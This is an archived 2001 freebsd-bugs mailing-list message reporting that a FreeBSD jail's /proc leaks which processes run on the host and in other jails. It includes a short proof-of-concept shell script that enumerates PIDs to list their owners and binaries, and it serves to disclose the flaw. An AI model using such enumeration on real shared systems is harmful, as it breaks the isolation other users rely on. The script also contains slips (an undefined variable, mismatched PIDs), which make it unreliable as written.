Date: Mon, 29 Oct 2001 11:31:53 +0100 From: oPr <opr@bsdaemon.be> To: freebsd-bugs@freebsd.org Subject: Fw: jail's /proc Message-ID: <20011029113153.7ef38ebe.opr@bsdaemon.be>
next in thread | raw e-mail | index | archive | help
Hello, i really have no clue if i should mail this to you guys, but we've found some issue's in de jail's /proc. We were able to find information about processes running outside the jail, or running in other jails. eg. when i run sshd in the host system, and it has PID 655, i can login on the jail, and by execution "ls -l /proc/665/file" i can see what binary is running on pid 655. So any user of the jail system can see what processes you run on that server. I'm running FreeBSD 4.4-RELEASE on a i386. greetz, Pieter Danhieux Proof of concept shellscript: #!/bin/sh _COUNT=0; while [ $_COUNT -le 65000 ]; do if [ -f /proc/$_COUNT/file ]; then _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`; _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`; echo "PID= $_TELLER USER= $_USER PROC= $_PROC"; fi _COUNT=`expr $_COUNT + 1`; done ----------------- [www.bsdaemon.be] ----------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011029113153.7ef38ebe.opr>